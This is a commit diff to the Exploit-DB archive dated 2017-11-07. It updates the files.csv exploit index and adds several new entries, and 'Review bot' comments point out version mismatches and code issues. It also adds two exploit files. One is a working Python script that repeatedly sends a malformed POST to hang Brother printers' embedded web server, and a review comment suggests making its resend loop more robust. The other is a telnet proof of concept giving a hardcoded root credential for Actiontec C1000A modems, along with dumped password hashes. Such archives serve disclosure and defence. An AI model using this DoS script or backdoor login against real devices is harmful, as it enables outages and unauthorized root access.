DB: 2017-11-07

9 new exploits

G Data TotalCare 2011 - NtOpenKey Race Condition
G Data TotalCare 2011 - 'NtOpenKey' Race Condition

QNX 6.1 - TimeCreate Local Denial of Service
QNX 6.1 - 'TimeCreate' Local Denial of Service
Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)
Debut Embedded httpd 1.20 - Denial of Service
Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow
SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)

PHP 5.3.0 - pdflib Arbitrary File Write
PHP 5.3.0 - 'pdflib' Arbitrary File Write
Actiontec C1000A Modem - Backdoor Account
Avaya OfficeScan (IPO) < 10.1 - 'SoftConsole' Buffer Overflow (SEH)

Joomla! Component com_virtuemart 1.1.7/1.5 - Blind Time-Based SQL Injection (Metasploit)
Joomla! Component com_virtuemart 1.1.7/1.5 - Blind SQL Injection (Metasploit)

Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection
Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection

Joomla! 2.5.0 < 2.5.1 - Time Based SQL Injection
Joomla! 2.5.0 < 2.5.1 - Blind SQL Injection

xt:Commerce 3.04 SP2.1 - Time Based Blind SQL Injection
xt:Commerce 3.04 SP2.1 - Blind SQL Injection

MyBB 1.6.9 - 'editpost.php?posthash' Time Based SQL Injection
MyBB 1.6.9 - 'editpost.php?posthash' Blind SQL Injection

Tableau Server - Blind SQL Injection
Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection

GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection
GeoCore MAX DB Ver. 7.3.3 - Blind SQL Injection

Joomla! 2.5.1 - 'redirect.php' Time Based SQL Injection
Joomla! 2.5.1 - 'redirect.php' Blind SQL Injection

Milw0rm Clone Script 1.0 - Time Based SQL Injection
Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection

Milw0rm Clone Script 1.0 - Authentication Bypass
Milw0rm Clone Script 1.0 - '/admin/login.php' Authentication Bypass

RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections
RealtyScript 4.0.2 - Multiple Blind SQL Injections
WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass
Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting
Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting
This commit is contained in:
Offensive Security 2017-11-07 05:01:33 +00:00
parent 1b68675830
commit 6f7af333ff
10 changed files with 552 additions and 14 deletions

@ -1794,7 +1794,7 @@ id,file,description,date,author,platform,type,port
15434,platforms/windows/dos/15434.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15435,platforms/windows/dos/15435.html,"LeadTools 11.5.0.9 - 'lttmb11n.ocx' BrowseDir() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15436,platforms/windows/dos/15436.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos,0
15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - 'NtOpenKey' Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos,0
15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0
15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0
15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,windows,dos,0
@ -2732,7 +2732,7 @@ id,file,description,date,author,platform,type,port
21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4 / D-Link DI-804 4.68/Dl-704 2.56 b5 - Embedded HTTP Server Denial of Service",2002-11-01,"Mark Litchfield",hardware,dos,0
21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,windows,dos,0
21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0
21984,platforms/unix/dos/21984.c,"QNX 6.1 - TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0
21984,platforms/unix/dos/21984.c,"QNX 6.1 - 'TimeCreate' Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0
21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0
21986,platforms/windows/dos/21986.pl,"Microsoft Windows Media Player 10 - '.avi' Integer Division By Zero Crash (PoC)",2012-10-15,Dark-Puzzle,windows,dos,0
21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p 'quartz.dll' Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",windows,dos,0
@ -5725,6 +5725,10 @@ id,file,description,date,author,platform,type,port
43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0
43060,platforms/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",windows,dos,0
43111,platforms/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,multiple,dos,0
43115,platforms/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",windows,dos,0
43119,platforms/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,hardware,dos,0
43120,platforms/windows/dos/43120.txt,"Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,windows,dos,0
43124,platforms/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
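Review bot: the version strings in the new 43115 and 43120 rows do not match the exploit headers added in this same commit: 43115.py says `#Version: 12.6.03` while the row says `< 12.6.0.3`, and 43120.txt gives the affected range as `v9.1.0 - 10.1` (10.1 included) while the row says `< 10.1`, which excludes it. Correct either the rows or the headers so a reader grepping files.csv gets the same answer as the advisory. Also, 43120 is filed under `windows/dos` while its sibling 43121 (same product, same author) goes under `windows/remote`; the crash shown in 43120.txt is a NULL read rather than a demonstrated overflow, so `dos` is the defensible type, but the row description "ActiveX Buffer Overflow" should then be toned down to match.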
@ -6612,7 +6616,7 @@ id,file,description,date,author,platform,type,port
9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Privilege Escalation",2009-09-17,Rick,linux,local,0
9807,platforms/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,windows,local,0
9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - 'pdflib' Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0
9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 - VFS/devfs Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0
@ -15937,6 +15941,8 @@ id,file,description,date,author,platform,type,port
43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0
43105,platforms/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",hardware,remote,0
43112,platforms/unix/remote/43112.rb,"tnftp - 'savefile' Arbitrary Command Execution (Metasploit)",2017-11-03,Metasploit,unix,remote,0
43118,platforms/hardware/remote/43118.txt,"Actiontec C1000A Modem - Backdoor Account",2017-11-04,"Joseph McDonagh",hardware,remote,0
43121,platforms/windows/remote/43121.txt,"Avaya OfficeScan (IPO) < 10.1 - 'SoftConsole' Buffer Overflow (SEH)",2017-11-05,hyp3rlinx,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -25611,7 +25617,7 @@ id,file,description,date,author,platform,type,port
17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0
17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0
17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",cgi,webapps,0
17579,platforms/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.1.7/1.5 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0
17579,platforms/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.1.7/1.5 - Blind SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0
17584,platforms/php/webapps/17584.php,"cFTP 0.1 - 'r80' Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0
17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Cross-Site Scripting Multiple Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0
17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
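Review bot: dropping "Time-Based" from the 17579 description (the same edit is applied to the other time-based rows below) loses the one detail that distinguishes this class of blind injection: a time-based blind needs a sleep/benchmark primitive and a delay threshold, while boolean-based blind does not, and that is exactly what a tester choosing a technique (sqlmap `--technique=T` versus `B`) needs from the title. If the goal is uniform "Blind SQL Injection" naming, keep the qualifier in parentheses, e.g. `Blind SQL Injection (Time-Based)`, so the index stays consistent without discarding the information.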
@ -25877,7 +25883,7 @@ id,file,description,date,author,platform,type,port
18132,platforms/php/webapps/18132.php,"Support Incident Tracker 3.65 - 'translate.php' Remote Code Execution",2011-11-19,EgiX,php,webapps,0
18114,platforms/php/webapps/18114.txt,"WordPress Plugin AdRotate 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0
18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0
18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0
18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0
18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq Arbitrary File Upload",2011-11-15,PCA,php,webapps,0
18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - 'ajax_save_name.php' Remote Code Execution",2011-11-16,EgiX,php,webapps,0
18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0
@ -26072,7 +26078,7 @@ id,file,description,date,author,platform,type,port
18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0
18583,platforms/php/webapps/18583.txt,"Saman Portal - Local File Inclusion",2012-03-12,TMT,php,webapps,0
18616,platforms/php/webapps/18616.txt,"Pre Printing Press - 'product_desc.php?pid' SQL Injection",2012-03-18,"Easy Laster",php,webapps,0
18618,platforms/php/webapps/18618.pl,"Joomla! 2.5.0 < 2.5.1 - Time Based SQL Injection",2012-03-19,"A. Ramos",php,webapps,0
18618,platforms/php/webapps/18618.pl,"Joomla! 2.5.0 < 2.5.1 - Blind SQL Injection",2012-03-19,"A. Ramos",php,webapps,0
18589,platforms/php/webapps/18589.txt,"Acal Calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",php,webapps,0
18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
18590,platforms/php/webapps/18590.txt,"PBLang Bulletin Board System - Local File Inclusion",2012-03-13,"Number 7",php,webapps,0
@ -26411,7 +26417,7 @@ id,file,description,date,author,platform,type,port
20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps,0
20541,platforms/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0
20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0
20544,platforms/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0
20544,platforms/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0
20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0
20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0
20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",php,webapps,0
@ -27404,7 +27410,7 @@ id,file,description,date,author,platform,type,port
23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting",2004-03-01,"David Sopas Ferreira",php,webapps,0
23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak & BackSpace",php,webapps,0
23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple SQL Injections",2004-03-01,"Alnitak & BackSpace",php,webapps,0
23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php?posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0
23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php?posthash' Blind SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0
23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0
24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0
24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - 'blocker_query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-23,waraxe,php,webapps,0
@ -32616,7 +32622,7 @@ id,file,description,date,author,platform,type,port
32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0
32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0
31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880
31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80
31578,platforms/windows/webapps/31578.txt,"Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80
31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0
31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_Guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
31581,platforms/php/webapps/31581.txt,"PHPGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,php,webapps,0
@ -33505,7 +33511,7 @@ id,file,description,date,author,platform,type,port
33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps,0
33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution",2014-04-28,LOTFREE,php,webapps,80
33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80
33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection",2014-04-28,Esac,php,webapps,80
33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Blind SQL Injection",2014-04-28,Esac,php,webapps,80
33076,platforms/php/webapps/33076.txt,"WordPress Plugin iMember360 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80
33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Cross-Site Scripting",2009-06-14,Moudi,php,webapps,0
33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,php,webapps,0
@ -35826,7 +35832,7 @@ id,file,description,date,author,platform,type,port
36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Local File Inclusion",2012-03-05,"Aung Khant",php,webapps,0
36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 - 'admin/comments?topicID' SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - 'admin/tps?id' SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
36913,platforms/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Time Based SQL Injection",2012-03-05,"Colin Wong",php,webapps,0
36913,platforms/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Blind SQL Injection",2012-03-05,"Colin Wong",php,webapps,0
36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - Local File Inclusion",2015-05-04,Vulnerability-Lab,ios,webapps,0
36973,platforms/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps,0
36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0
@ -36061,7 +36067,7 @@ id,file,description,date,author,platform,type,port
37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,php,webapps,0
37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0
37353,platforms/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - Time Based SQL Injection",2015-06-09,Pancaker,php,webapps,0
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection",2015-06-09,Pancaker,php,webapps,0
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37238,platforms/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
@ -36101,7 +36107,7 @@ id,file,description,date,author,platform,type,port
37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0
37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' & 1=1--",php,webapps,0
37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps,0
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - '/admin/login.php' Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0
37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0
37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0
37331,platforms/php/webapps/37331.py,"WHMCompleteSolution (WHMCS) - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0
@ -36753,7 +36759,7 @@ id,file,description,date,author,platform,type,port
38491,platforms/php/webapps/38491.php,"SMF - '/index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0
38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,php,webapps,0
38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0
38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0
38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",php,webapps,0
38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",php,webapps,0
@ -38808,3 +38814,6 @@ id,file,description,date,author,platform,type,port
43110,platforms/php/webapps/43110.txt,"WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection",2017-11-03,"Lenon Leite",php,webapps,0
43113,platforms/xml/webapps/43113.txt,"Ladon Framework for Python 0.9.40 - XML External Entity Expansion",2017-11-03,"RedTeam Pentesting",xml,webapps,0
43114,platforms/java/webapps/43114.py,"Oracle PeopleSoft Enterprise PeopleTools < 8.55 - Remote Code Execution Via Blind XML External Entity",2017-05-17,"Charles Fol",java,webapps,0
43117,platforms/php/webapps/43117.txt,"WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass",2017-11-04,"Colette Chamberland",php,webapps,0
43122,platforms/multiple/webapps/43122.txt,"Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
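Review bot: the 43117 row says `WordPress Plugin Userpro < 4.9.17.1` but the file 43117.txt added in this commit says `# Version: <= 4.6.17`, and its timeline names no fixed version at all (only "10/26/2017 Vendor resolved the issue in the plugin"). One of the two numbers is wrong; the row is what users search, so confirm the fixed release against the vendor changelog and put the same value in both places.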

platforms/hardware/dos/43119.py Executable file
@ -0,0 +1,54 @@
# Exploit Title: Remote un-authenticated DoS in Debut embedded httpd server in Brother printers
# Date: 11/02/2017
# Exploit Author: z00n (@0xz00n)
# Vendor Homepage: http://www.brother-usa.com
# Version: <= 1.20
# CVE : CVE-2017-16249
#
#Description:
#The Debut embedded http server contains a remotely exploitable denial of service where a single malformed HTTP POST request can cause the server to hang until eventually replying with an HTTP 500 error. While the server is hung, print jobs over the network are blocked and the web interface is inaccessible. An attacker can continuously send this malformed request to keep the device inaccessible to legitimate traffic.
#
#Remediation Steps:
#No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.
#
#Disclosure Attempts:
#09/11/2017 - Attempt to contact vendor
#10/03/2017 - Live chat communications with vendor regarding no reply
#10/25/2017 - Attempt to contact vendor
#11/02/2017 - Advisory published
#
#Proof of Concept:
#!/usr/bin/python
import socket
import sys
target = raw_input("[*] Enter target IP or hostname: ")
port = raw_input("[*] Enter target port: ")
payload = "POST / HTTP/1.1\r\n"
payload += "Host: asdasdasd\r\n"
payload += "User-Agent: asdasdasd\r\n"
payload += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
payload += "Accept-Language: en-US,en;q=0.5\r\n"
payload += "Referer: asdasdasdasd\r\n"
payload += "Connection: close\r\n"
payload += "Upgrade-Insecure-Requests: 1\r\n"
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: 42\r\n"
payload += "asdasdasdasdasdasdasd\r\n\r\n"
print "[*] Starting DOS. Payload will be sent every time the server responds."
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target,int(port)))
print "[*] Sending DOS payload"
s.send(payload)
# Wait for server to respond with 500 error
s.recv(4096)
s.close()
except:
print("[!] Can't connect to target")
sys.exit()
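Review bot: the bare `except:` at the bottom of the loop swallows every exception, including `KeyboardInterrupt`, so Ctrl-C during the blocking `s.recv(4096)` prints "Can't connect to target" instead of stopping cleanly, and the same handler hides the difference between a refused connection and a server that never answers. Since the description says the server hangs before eventually returning a 500, `s.recv()` with no `settimeout()` can block for as long as the device stays wedged; set a timeout, catch `socket.timeout` and `socket.error` separately, and resend on timeout rather than exit. Note also that the request is malformed by design: the line after `Content-Length: 42` is sent as a header line with no blank line terminating the header block and no 42-byte body, which is the trigger and should be stated in the description so nobody "fixes" it. The loop body as rendered here has lost its indentation; check the committed file keeps it, since the script is Python 2 (`raw_input`, `print` statement) and will not parse otherwise.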

@ -0,0 +1,32 @@
# Exploit Title: Actiontec C1000A backdoor account
# Google Dork: NA
# Date: 11/04/2017
# Exploit Author: Joseph McDonagh
# Vendor Homepage: https://actiontecsupport.zendesk.com/hc/en-us
# Software Link: N/A Hardware
# Version: Firmware CAC003-31.30L.86
# Tested on: Linux
# CVE : NA
# The Actiontec C1000A Modem provided by CenturyLink has hardcoded passwords. This is similar to another recent submission by Matthew Shiemo, who inspired me to check the device I use.
# Proof of Concept
$ telnet 192.168.0.1
===Actiontec xDSL Router===
Login: admin
Password: CenturyL1nk
> sh
BusyBox v1.17.2 (2015-10-30 10:34:29 CST built-in shell (ash)
Enter 'help' for a list of build-in commands
# cat /etc/passwd
admin:Rtqa.nQhYPBRo:0:0:Administratir:/:/bin/sh
support:vmiTSa8ukDkOY:0:0:Technical Support:/:/bin/sh
user:Fq10qi6QmLmmY:0:0:Normal User:/:/bin/sh
nobody:rZy3YulyLvuYU:0:0:nobody for ftp:/bin/sh
# cat /proc/version
Linux version 2.6.30 (waye@hugh-PowerEdge-R220.home) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #1 SMP PREEMPT Fri Oct 30 12:32:15 CST 2015
# cat /etc/group
root::0:root,admin,support,user
